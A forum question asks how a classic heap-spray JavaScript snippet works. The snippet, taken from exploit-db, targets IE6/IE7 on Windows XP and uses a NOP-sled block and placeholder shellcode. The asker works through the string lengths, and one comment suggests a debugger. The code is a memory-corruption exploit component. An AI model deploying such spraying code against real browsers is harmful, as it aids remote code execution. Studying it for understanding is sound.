# How to understand this heap spray javascript code

Tags: windows, exploit, javascript

This is the code used in heap spraying on ie6,ie7 ,Windows XP,found in exploit-db.

```
<script >

var shellcode = unescape('%u\4141%u\4141');

var bigblock = unescape('%u\9090%u\9090');

var headersize = 20;

var slackspace = headersize + shellcode.length;

while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock.substring(0,bigblock.length - slackspace);

while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new Array();

for (i = 0; i < 500; i++){ memory[i] = block + shellcode }

</script>
```

I have some questiones about this code.I think the value of variable  `slackspace` is 22,and next line,finishing executing the loop,the length of `bigblock` is 22 with actually 44 bytes of `0x90`.Then,next line,the length of `fillblock` is 11 ,and its content is 22 bytes of `0x90`.Then next line,the length of `block` is 0?The variable `block` is a string variable with the length of 0?And how to understand the following part of code? Someone tell me how to understand the code?

Comment: add some console.log() calls to it and/or step through it in the debugger to see exactly what it's doing.